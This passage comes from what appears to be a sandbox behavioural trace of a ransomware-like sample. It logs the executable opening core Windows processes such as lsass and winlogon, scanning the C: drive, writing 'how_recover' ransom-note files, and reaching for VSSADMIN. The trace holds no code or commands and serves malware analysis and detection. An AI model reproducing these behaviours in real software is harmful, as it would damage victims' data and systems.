3052.          source:
3053.            processinfo:
3054.              pid: 1648
3055.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3056.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3057.        process:
3058.          timestamp: 41931
3059.          mode: opened
3060.          sequenceNumber: 222
3061.          desiredaccess: 0x02000030
3062.          ntstatus: 0x00000000
3063.          target:
3064.            processinfo:
3065.              pid: 396
3066.              imagepath: C:\Windows\System32\csrss.exe
3067.              md5sum: 60c2862b4bf0fd9f582ef344c2b1ec72
3068.          source:
3069.            processinfo:
3070.              pid: 1648
3071.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3072.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3073.        process:
3074.          timestamp: 41937
3075.          mode: opened
3076.          sequenceNumber: 223
3077.          desiredaccess: 0x02000030
3078.          ntstatus: 0x00000000
3079.          target:
3080.            processinfo:
3081.              pid: 432
3082.              imagepath: C:\Windows\System32\winlogon.exe
3083.              md5sum: 1151b1baa6f350b1db6598e0fea7c457
3084.          source:
3085.            processinfo:
3086.              pid: 1648
3087.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3088.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3089.        process:
3090.          timestamp: 41941
3091.          mode: opened
3092.          sequenceNumber: 224
3093.          desiredaccess: 0x02000030
3094.          ntstatus: 0x00000000
3095.          target:
3096.            processinfo:
3097.              pid: 476
3098.              imagepath: C:\Windows\System32\services.exe
3099.              md5sum: 24acb7e5be595468e3b9aa488b9b4fcb
3100.          source:
3101.            processinfo:
3102.              pid: 1648
3103.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3104.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3105.        process:
3106.          timestamp: 41948
3107.          mode: opened
3108.          sequenceNumber: 225
3109.          desiredaccess: 0x02000030
3110.          ntstatus: 0x00000000
3111.          target:
3112.            processinfo:
3113.              pid: 492
3114.              imagepath: C:\Windows\System32\lsass.exe
3115.              md5sum: 0793f40b9b8a1bdd266296409dbd91ea
3116.          source:
3117.            processinfo:
3118.              pid: 1648
3119.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3120.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3121.        process:
3122.          timestamp: 41952
3123.          mode: opened
3124.          sequenceNumber: 226
3125.          desiredaccess: 0x02000030
3126.          ntstatus: 0x00000000
3127.          target:
3128.            processinfo:
3129.              pid: 500
3130.              imagepath: C:\Windows\System32\lsm.exe
3131.              md5sum: 9662ee182644511439f1c53745dc1c88
3132.          source:
3133.            processinfo:
3134.              pid: 1648
3135.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3136.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3137.        process:
3138.          timestamp: 41957
3139.          mode: opened
3140.          sequenceNumber: 227
3141.          desiredaccess: 0x02000030
3142.          ntstatus: 0x00000000
3143.          target:
3144.            processinfo:
3145.              pid: 612
3146.              imagepath: C:\Windows\System32\svchost.exe
3147.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3148.          source:
3149.            processinfo:
3150.              pid: 1648
3151.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3152.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3153.        process:
3154.          timestamp: 41961
3155.          mode: opened
3156.          sequenceNumber: 228
3157.          desiredaccess: 0x02000030
3158.          ntstatus: 0x00000000
3159.          target:
3160.            processinfo:
3161.              pid: 684
3162.              imagepath: C:\Windows\System32\svchost.exe
3163.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3164.          source:
3165.            processinfo:
3166.              pid: 1648
3167.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3168.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3169.        process:
3170.          timestamp: 41994
3171.          mode: opened
3172.          sequenceNumber: 229
3173.          desiredaccess: 0x02000030
3174.          ntstatus: 0x00000000
3175.          target:
3176.            processinfo:
3177.              pid: 756
3178.              imagepath: C:\Windows\System32\svchost.exe
3179.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3180.          source:
3181.            processinfo:
3182.              pid: 1648
3183.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3184.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3185.        process:
3186.          timestamp: 41999
3187.          mode: opened
3188.          sequenceNumber: 230
3189.          desiredaccess: 0x02000030
3190.          ntstatus: 0x00000000
3191.          target:
3192.            processinfo:
3193.              pid: 828
3194.              imagepath: C:\Windows\System32\svchost.exe
3195.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3196.          source:
3197.            processinfo:
3198.              pid: 1648
3199.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3200.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3201.        process:
3202.          timestamp: 42005
3203.          mode: opened
3204.          sequenceNumber: 231
3205.          desiredaccess: 0x02000030
3206.          ntstatus: 0x00000000
3207.          target:
3208.            processinfo:
3209.              pid: 868
3210.              imagepath: C:\Windows\System32\svchost.exe
3211.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3212.          source:
3213.            processinfo:
3214.              pid: 1648
3215.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3216.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3217.        process:
3218.          timestamp: 42090
3219.          mode: opened
3220.          sequenceNumber: 232
3221.          desiredaccess: 0x02000030
3222.          ntstatus: 0x00000000
3223.          target:
3224.            processinfo:
3225.              pid: 904
3226.              imagepath: C:\Windows\System32\svchost.exe
3227.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3228.          source:
3229.            processinfo:
3230.              pid: 1648
3231.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3232.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3233.        process:
3234.          timestamp: 42103
3235.          mode: opened
3236.          sequenceNumber: 233
3237.          desiredaccess: 0x02000030
3238.          ntstatus: 0x00000000
3239.          target:
3240.            processinfo:
3241.              pid: 968
3242.              imagepath: C:\Windows\System32\spoolsv.exe
3243.              md5sum: b96c17b5dc1424d56eea3a99e97428cd
3244.          source:
3245.            processinfo:
3246.              pid: 1648
3247.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3248.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3249.        process:
3250.          timestamp: 42110
3251.          mode: opened
3252.          sequenceNumber: 234
3253.          desiredaccess: 0x02000030
3254.          ntstatus: 0x00000000
3255.          target:
3256.            processinfo:
3257.              pid: 1064
3258.              imagepath: C:\Windows\System32\svchost.exe
3259.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3260.          source:
3261.            processinfo:
3262.              pid: 1648
3263.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3264.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3265.        process:
3266.          timestamp: 42115
3267.          mode: opened
3268.          sequenceNumber: 235
3269.          desiredaccess: 0x02000030
3270.          ntstatus: 0x00000000
3271.          target:
3272.            processinfo:
3273.              pid: 1164
3274.              imagepath: C:\Windows\System32\taskhost.exe
3275.              md5sum: 639774c9acd063f028f6084abf5593ad
3276.          source:
3277.            processinfo:
3278.              pid: 1648
3279.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3280.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3281.        process:
3282.          timestamp: 42120
3283.          mode: opened
3284.          sequenceNumber: 236
3285.          desiredaccess: 0x02000030
3286.          ntstatus: 0x00000000
3287.          target:
3288.            processinfo:
3289.              pid: 1244
3290.              imagepath: C:\Windows\System32\dwm.exe
3291.              md5sum: f162d5f5e845b9dc352dd1bad8cef1bc
3292.          source:
3293.            processinfo:
3294.              pid: 1648
3295.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3296.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3297.        process:
3298.          timestamp: 42125
3299.          mode: opened
3300.          sequenceNumber: 237
3301.          desiredaccess: 0x02000030
3302.          ntstatus: 0x00000000
3303.          target:
3304.            processinfo:
3305.              pid: 1340
3306.              imagepath: C:\Windows\System32\svchost.exe
3307.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3308.          source:
3309.            processinfo:
3310.              pid: 1648
3311.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3312.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3313.        process:
3314.          timestamp: 42130
3315.          mode: opened
3316.          sequenceNumber: 238
3317.          desiredaccess: 0x02000030
3318.          ntstatus: 0x00000000
3319.          target:
3320.            processinfo:
3321.              pid: 1092
3322.              imagepath: C:\Windows\explorer.exe
3323.              md5sum: ac4c51eb24aa95b77f705ab159189e24
3324.          source:
3325.            processinfo:
3326.              pid: 1648
3327.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3328.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3329.        process:
3330.          timestamp: 42136
3331.          mode: opened
3332.          sequenceNumber: 239
3333.          desiredaccess: 0x02000030
3334.          ntstatus: 0x00000000
3335.          target:
3336.            processinfo:
3337.              pid: 940
3338.              imagepath: C:\Windows\System32\wbem\WmiPrvSE.exe
3339.              md5sum: 619a67c9f617b7e69315bb28ecd5e1df
3340.          source:
3341.            processinfo:
3342.              pid: 1648
3343.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3344.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3345.        process:
3346.          timestamp: 42200
3347.          mode: opened
3348.          sequenceNumber: 240
3349.          desiredaccess: 0x02000030
3350.          ntstatus: 0x00000000
3351.          target:
3352.            processinfo:
3353.              pid: 1976
3354.              imagepath: C:\Program Files\Internet Explorer\iexplore.exe
3355.              md5sum: 0685765c0cbe095ba0c6c8790bae21ef
3356.          source:
3357.            processinfo:
3358.              pid: 1648
3359.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3360.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3361.        process:
3362.          timestamp: 42206
3363.          mode: opened
3364.          sequenceNumber: 241
3365.          desiredaccess: 0x02000030
3366.          ntstatus: 0xc0000022
3367.          target:
3368.            processinfo:
3369.              pid: 384
3370.              tid: 0
3371.              imagepath: N/A
3372.          source:
3373.            processinfo:
3374.              pid: 1648
3375.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3376.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3377.        process:
3378.          timestamp: 42210
3379.          mode: opened
3380.          sequenceNumber: 242
3381.          desiredaccess: 0x02000030
3382.          ntstatus: 0x00000000
3383.          target:
3384.            processinfo:
3385.              pid: 1460
3386.              imagepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
3387.              md5sum: c8a8321292a459b0a17fb39a782a5c74
3388.          source:
3389.            processinfo:
3390.              pid: 1648
3391.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3392.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3393.        process:
3394.          timestamp: 42215
3395.          mode: opened
3396.          sequenceNumber: 243
3397.          desiredaccess: 0x02000030
3398.          ntstatus: 0x00000000
3399.          target:
3400.            processinfo:
3401.              pid: 1312
3402.              imagepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
3403.              md5sum: c8a8321292a459b0a17fb39a782a5c74
3404.          source:
3405.            processinfo:
3406.              pid: 1648
3407.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3408.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3409.        process:
3410.          timestamp: 42220
3411.          mode: opened
3412.          sequenceNumber: 244
3413.          desiredaccess: 0x02000030
3414.          ntstatus: 0x00000000
3415.          target:
3416.            processinfo:
3417.              pid: 1324
3418.              imagepath: C:\Program Files (x86)\Internet Explorer9\iexplore.exe
3419.              md5sum: 904e13ba41af2e353a32cf351ca53639
3420.          source:
3421.            processinfo:
3422.              pid: 1648
3423.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3424.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3425.        process:
3426.          timestamp: 42225
3427.          mode: opened
3428.          sequenceNumber: 245
3429.          desiredaccess: 0x02000030
3430.          ntstatus: 0x00000000
3431.          target:
3432.            processinfo:
3433.              pid: 1852
3434.              imagepath: C:\Program Files (x86)\Internet Explorer9\iexplore.exe
3435.              md5sum: 904e13ba41af2e353a32cf351ca53639
3436.          source:
3437.            processinfo:
3438.              pid: 1648
3439.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3440.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3441.        process:
3442.          timestamp: 42230
3443.          mode: opened
3444.          sequenceNumber: 246
3445.          desiredaccess: 0x02000030
3446.          ntstatus: 0x00000000
3447.          target:
3448.            processinfo:
3449.              pid: 2152
3450.              imagepath: C:\Windows\System32\wbem\WmiPrvSE.exe
3451.              md5sum: 619a67c9f617b7e69315bb28ecd5e1df
3452.          source:
3453.            processinfo:
3454.              pid: 1648
3455.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3456.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3457.        process:
3458.          timestamp: 42235
3459.          mode: opened
3460.          sequenceNumber: 247
3461.          desiredaccess: 0x02000030
3462.          ntstatus: 0x00000000
3463.          target:
3464.            processinfo:
3465.              pid: 2320
3466.              imagepath: C:\Windows\System32\taskhost.exe
3467.              md5sum: 639774c9acd063f028f6084abf5593ad
3468.          source:
3469.            processinfo:
3470.              pid: 1648
3471.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3472.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3473.        file:
3474.          timestamp: 42239
3475.          mode: find
3476.          sequenceNumber: 248
3477.          value: C:\*
3478.          processinfo:
3479.            pid: 1648
3480.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3481.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3482.          ntstatus: 0x0
3483.          CreateOptions: 0x0
3484.        file:
3485.          timestamp: 42242
3486.          mode: find
3487.          sequenceNumber: 249
3488.          value: C:\$Recycle.Bin\*
3489.          processinfo:
3490.            pid: 1648
3491.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3492.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3493.          ntstatus: 0x0
3494.          CreateOptions: 0x0
3495.        file:
3496.          timestamp: 42246
3497.          mode: created
3498.          sequenceNumber: 250
3499.          value: C:\$Recycle.Bin\S-1-5-21-2529703413-2662079939-3113469119-500\how_recover+deg.txt
3500.          processinfo:
3501.            pid: 1648
3502.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3503.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3504.            ads:
3505.          fid (ads:): 1125899906942063
3506.          ntstatus: 0x0
3507.          CreateOptions: 0x60
3508.        file:
3509.          timestamp: 42275
3510.          mode: close
3511.          sequenceNumber: 251
3512.          value: C:\$Recycle.Bin\S-1-5-21-2529703413-2662079939-3113469119-500\how_recover+deg.txt
3513.          filesize: 2673
3514.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
3515.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
3516.          processinfo:
3517.            pid: 1648
3518.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3519.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3520.            ads:
3521.          fid (ads:): 1125899906942063
3522.          ntstatus: 0x0
3523.          CreateOptions: 0x0
3524.        file:
3525.          timestamp: 42280
3526.          mode: created
3527.          sequenceNumber: 252
3528.          value: C:\$Recycle.Bin\S-1-5-21-2529703413-2662079939-3113469119-500\how_recover+deg.html
3529.          processinfo:
3530.            pid: 1648
3531.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3532.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3533.            ads:
3534.          fid (ads:): 1688849860363608
3535.          ntstatus: 0x0
3536.          CreateOptions: 0x60
3537.        file:
3538.          timestamp: 42284
3539.          mode: close
3540.          sequenceNumber: 253
3541.          value: C:\$Recycle.Bin\S-1-5-21-2529703413-2662079939-3113469119-500\how_recover+deg.html
3542.          filesize: 9480
3543.          md5sum: a68c3caf0be8f1a393c697136926cfd4
3544.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
3545.          processinfo:
3546.            pid: 1648
3547.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3548.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3549.            ads:
3550.          fid (ads:): 1688849860363608
3551.          ntstatus: 0x0
3552.          CreateOptions: 0x0
3553.        apicall:
3554.          timestamp: 42074
3555.          sequenceNumber: 254
3556.          processinfo:
3557.            pid: 1648
3558.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3559.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3560.          dllname: kernel32.dll
3561.          apiname: GetSystemDirectoryW
3562.          address: 0x75f92cf2
3563.          params:
3564.            param (id:1): 0x294fa60
3565.            param (id:2): 260
3566.        file:
3567.          timestamp: 42292
3568.          mode: failed
3569.          sequenceNumber: 255
3570.          value: C:\Users\ADMINI~1\AppData\Local\Temp\VSSADMIN.EXE
3571.          processinfo:
3572.            tainted: true
3573.            pid: 1648
3574.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3575.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3576.            ads:
3577.          fid (ads:): 0
3578.          failure: open
3579.          ntstatus: 0xc0000034
3580.          CreateOptions: 0x200000
3581.          PE:
3582.            InspectionType: Ext
3583.        file:
3584.          timestamp: 42296
3585.          mode: created
3586.          sequenceNumber: 256
3587.          value: C:\$Recycle.Bin\how_recover+deg.txt
3588.          processinfo:
3589.            pid: 1648
3590.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3591.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3592.            ads:
3593.          fid (ads:): 844424930231641
3594.          ntstatus: 0x0
3595.          CreateOptions: 0x60
3596.        apicall:
3597.          timestamp: 42091
3598.          sequenceNumber: 257
3599.          processinfo:
3600.            pid: 1648
3601.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3602.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3603.          dllname: kernel32.dll
3604.          apiname: GetVolumeNameForVolumeMountPointW
3605.          address: 0x76220aaa
3606.          params:
3607.            param (id:1): NULL
3608.            param (id:2): \\?\Volume{a4dcb962-c2b8-11e2-8b83-806e6f6e6963}\
3609.        process:
3610.          timestamp: 42304
3611.          mode: opened
3612.          sequenceNumber: 258
3613.          desiredaccess: 0x02000030
3614.          ntstatus: 0xc0000022
3615.          target:
3616.            processinfo:
3617.              pid: 4
3618.              tid: 0
3619.              imagepath: N/A
3620.          source:
3621.            processinfo:
3622.              pid: 1648
3623.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3624.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3625.        process:
3626.          timestamp: 42308
3627.          mode: opened
3628.          sequenceNumber: 259
3629.          desiredaccess: 0x02000030
3630.          ntstatus: 0x00000000
3631.          target:
3632.            processinfo:
3633.              pid: 264
3634.              imagepath: C:\Windows\System32\smss.exe
3635.              md5sum: 1911a3356fa3f77ccc825ccbac038c2a
3636.          source:
3637.            processinfo:
3638.              pid: 1648
3639.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3640.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3641.        process:
3642.          timestamp: 42313
3643.          mode: opened
3644.          sequenceNumber: 260
3645.          desiredaccess: 0x02000030
3646.          ntstatus: 0x00000000
3647.          target:
3648.            processinfo:
3649.              pid: 348
3650.              imagepath: C:\Windows\System32\csrss.exe
3651.              md5sum: 60c2862b4bf0fd9f582ef344c2b1ec72
3652.          source:
3653.            processinfo:
3654.              pid: 1648
3655.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3656.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3657.        process:
3658.          timestamp: 42317
3659.          mode: opened
3660.          sequenceNumber: 261
3661.          desiredaccess: 0x02000030
3662.          ntstatus: 0x00000000
3663.          target:
3664.            processinfo:
3665.              pid: 376
3666.              imagepath: C:\Windows\System32\wininit.exe
3667.              md5sum: 94355c28c1970635a31b3fe52eb7ceba
3668.          source:
3669.            processinfo:
3670.              pid: 1648
3671.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3672.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3673.        process:
3674.          timestamp: 42322
3675.          mode: opened
3676.          sequenceNumber: 262
3677.          desiredaccess: 0x02000030
3678.          ntstatus: 0x00000000
3679.          target:
3680.            processinfo:
3681.              pid: 396
3682.              imagepath: C:\Windows\System32\csrss.exe
3683.              md5sum: 60c2862b4bf0fd9f582ef344c2b1ec72
3684.          source:
3685.            processinfo:
3686.              pid: 1648
3687.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3688.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3689.        process:
3690.          timestamp: 42326
3691.          mode: opened
3692.          sequenceNumber: 263
3693.          desiredaccess: 0x02000030
3694.          ntstatus: 0x00000000
3695.          target:
3696.            processinfo:
3697.              pid: 432
3698.              imagepath: C:\Windows\System32\winlogon.exe
3699.              md5sum: 1151b1baa6f350b1db6598e0fea7c457
3700.          source:
3701.            processinfo:
3702.              pid: 1648
3703.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3704.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3705.        process:
3706.          timestamp: 42331
3707.          mode: opened
3708.          sequenceNumber: 264
3709.          desiredaccess: 0x02000030
3710.          ntstatus: 0x00000000
3711.          target:
3712.            processinfo:
3713.              pid: 476
3714.              imagepath: C:\Windows\System32\services.exe
3715.              md5sum: 24acb7e5be595468e3b9aa488b9b4fcb
3716.          source:
3717.            processinfo:
3718.              pid: 1648
3719.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3720.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3721.        process:
3722.          timestamp: 42335
3723.          mode: opened
3724.          sequenceNumber: 265
3725.          desiredaccess: 0x02000030
3726.          ntstatus: 0x00000000
3727.          target:
3728.            processinfo:
3729.              pid: 492
3730.              imagepath: C:\Windows\System32\lsass.exe
3731.              md5sum: 0793f40b9b8a1bdd266296409dbd91ea
3732.          source:
3733.            processinfo:
3734.              pid: 1648
3735.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3736.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3737.        process:
3738.          timestamp: 42369
3739.          mode: opened
3740.          sequenceNumber: 266
3741.          desiredaccess: 0x02000030
3742.          ntstatus: 0x00000000
3743.          target:
3744.            processinfo:
3745.              pid: 500
3746.              imagepath: C:\Windows\System32\lsm.exe
3747.              md5sum: 9662ee182644511439f1c53745dc1c88
3748.          source:
3749.            processinfo:
3750.              pid: 1648
3751.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3752.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3753.        process:
3754.          timestamp: 42374
3755.          mode: opened
3756.          sequenceNumber: 267
3757.          desiredaccess: 0x02000030
3758.          ntstatus: 0x00000000
3759.          target:
3760.            processinfo:
3761.              pid: 612
3762.              imagepath: C:\Windows\System32\svchost.exe
3763.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3764.          source:
3765.            processinfo:
3766.              pid: 1648
3767.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3768.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3769.        process:
3770.          timestamp: 42379
3771.          mode: opened
3772.          sequenceNumber: 268
3773.          desiredaccess: 0x02000030
3774.          ntstatus: 0x00000000
3775.          target:
3776.            processinfo:
3777.              pid: 684
3778.              imagepath: C:\Windows\System32\svchost.exe
3779.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3780.          source:
3781.            processinfo:
3782.              pid: 1648
3783.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3784.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3785.        process:
3786.          timestamp: 42384
3787.          mode: opened
3788.          sequenceNumber: 269
3789.          desiredaccess: 0x02000030
3790.          ntstatus: 0x00000000
3791.          target:
3792.            processinfo:
3793.              pid: 756
3794.              imagepath: C:\Windows\System32\svchost.exe
3795.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3796.          source:
3797.            processinfo:
3798.              pid: 1648
3799.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3800.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3801.        process:
3802.          timestamp: 42388
3803.          mode: opened
3804.          sequenceNumber: 270
3805.          desiredaccess: 0x02000030
3806.          ntstatus: 0x00000000
3807.          target:
3808.            processinfo:
3809.              pid: 828
3810.              imagepath: C:\Windows\System32\svchost.exe
3811.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3812.          source:
3813.            processinfo:
3814.              pid: 1648
3815.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3816.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3817.        process:
3818.          timestamp: 42393
3819.          mode: opened
3820.          sequenceNumber: 271
3821.          desiredaccess: 0x02000030
3822.          ntstatus: 0x00000000
3823.          target:
3824.            processinfo:
3825.              pid: 868
3826.              imagepath: C:\Windows\System32\svchost.exe
3827.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3828.          source:
3829.            processinfo:
3830.              pid: 1648
3831.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3832.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3833.        process:
3834.          timestamp: 42398
3835.          mode: opened
3836.          sequenceNumber: 272
3837.          desiredaccess: 0x02000030
3838.          ntstatus: 0x00000000
3839.          target:
3840.            processinfo:
3841.              pid: 904
3842.              imagepath: C:\Windows\System32\svchost.exe
3843.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3844.          source:
3845.            processinfo:
3846.              pid: 1648
3847.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3848.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3849.        process:
3850.          timestamp: 42402
3851.          mode: opened
3852.          sequenceNumber: 273
3853.          desiredaccess: 0x02000030
3854.          ntstatus: 0x00000000
3855.          target:
3856.            processinfo:
3857.              pid: 968
3858.              imagepath: C:\Windows\System32\spoolsv.exe
3859.              md5sum: b96c17b5dc1424d56eea3a99e97428cd
3860.          source:
3861.            processinfo:
3862.              pid: 1648
3863.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3864.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3865.        process:
3866.          timestamp: 42408
3867.          mode: opened
3868.          sequenceNumber: 274
3869.          desiredaccess: 0x02000030
3870.          ntstatus: 0x00000000
3871.          target:
3872.            processinfo:
3873.              pid: 1064
3874.              imagepath: C:\Windows\System32\svchost.exe
3875.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3876.          source:
3877.            processinfo:
3878.              pid: 1648
3879.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3880.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3881.        process:
3882.          timestamp: 42413
3883.          mode: opened
3884.          sequenceNumber: 275
3885.          desiredaccess: 0x02000030
3886.          ntstatus: 0x00000000
3887.          target:
3888.            processinfo:
3889.              pid: 1164
3890.              imagepath: C:\Windows\System32\taskhost.exe
3891.              md5sum: 639774c9acd063f028f6084abf5593ad
3892.          source:
3893.            processinfo:
3894.              pid: 1648
3895.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3896.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3897.        process:
3898.          timestamp: 42419
3899.          mode: opened
3900.          sequenceNumber: 276
3901.          desiredaccess: 0x02000030
3902.          ntstatus: 0x00000000
3903.          target:
3904.            processinfo:
3905.              pid: 1244
3906.              imagepath: C:\Windows\System32\dwm.exe
3907.              md5sum: f162d5f5e845b9dc352dd1bad8cef1bc
3908.          source:
3909.            processinfo:
3910.              pid: 1648
3911.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3912.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3913.        process:
3914.          timestamp: 42423
3915.          mode: opened
3916.          sequenceNumber: 277
3917.          desiredaccess: 0x02000030
3918.          ntstatus: 0x00000000
3919.          target:
3920.            processinfo:
3921.              pid: 1340
3922.              imagepath: C:\Windows\System32\svchost.exe
3923.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
3924.          source:
3925.            processinfo:
3926.              pid: 1648
3927.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3928.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3929.        process:
3930.          timestamp: 42428
3931.          mode: opened
3932.          sequenceNumber: 278
3933.          desiredaccess: 0x02000030
3934.          ntstatus: 0x00000000
3935.          target:
3936.            processinfo:
